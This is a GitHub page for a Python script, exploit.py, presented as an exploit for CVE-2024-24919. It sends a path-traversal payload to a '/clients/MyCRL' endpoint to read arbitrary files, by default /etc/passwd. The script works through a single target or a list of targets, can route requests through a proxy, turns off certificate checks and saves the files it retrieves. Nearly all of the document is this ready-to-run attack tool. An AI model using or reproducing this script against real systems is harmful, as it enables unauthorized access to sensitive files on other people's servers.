-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
82 lines (72 loc) · 2.96 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
import argparse
from requests import post, RequestException
import urllib3
# Suppress only the single InsecureRequestWarning from urllib3 needed to disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def banner():
banner_text = """
_ __ _
| |/ / | |
| ' / __ _ | | __ _ __ __ _ _
| < / _` || | / _` |\ \ /\ / /| | | |
| . \| (_| || || (_| | \ V V / | |_| |
|_|\_\\__,_||_| \__,_| \_/\_/ \__, |
__/ |
|___/
"""
return banner_text
print(banner())
parser = argparse.ArgumentParser(description="This is an exploit for CVE-2024-24919", usage=argparse.SUPPRESS)
parser.add_argument("-d", "--target", type=str, help="A target to be tested")
parser.add_argument("-l", "--list", type=str, help="List of targets to be tested")
parser.add_argument("-f", "--file", type=str, default="/etc/passwd", help="Specify a file to exploit (default: /etc/passwd)")
parser.add_argument("-proxy", "--proxy", type=str, help="Proxy to use for requests")
parser.add_argument("-o", "--output", type=str, help="Filename to save the output (default: /etc/passwd)", default="./output.txt")
parser.add_argument("-v","--verbose",help="Showing the progress (Expected 1 or 0 as avalue) default 1",default=1)
args = parser.parse_args()
def send_request(target, file, proxy):
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0"
}
try:
response = post(
f"https://{target}/clients/MyCRL",
data=f"aCSHELL/../../../../../../..{file}",
headers=headers,
verify=False,
proxies=proxy
)
return (response.text)
except RequestException:
return f"Failed to connect to {target}"
def main():
# URL or List argument should be given
if not args.list and not args.target:
print(parser.print_help())
print("-d or -l should be given")
exit()
proxy = {"http": args.proxy, "https": args.proxy} if args.proxy else None
targets = [args.target] if args.target else []
if args.list:
with open(args.list) as file:
targets.extend([line.strip() for line in file if line.strip()])
for target in targets:
result = send_request(target, args.file, proxy)
if args.verbose:
print(f"Testing {target}")
print(result)
if args.output:
with open(args.output,'a') as output_file:
output_file.write(f"Target: {target}\n\n")
output_file.write(result)
output_file.write("\n\n")
else:
print(f"Target: {target}\n{result}\n\n")
print(result)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
print("exit")
exit()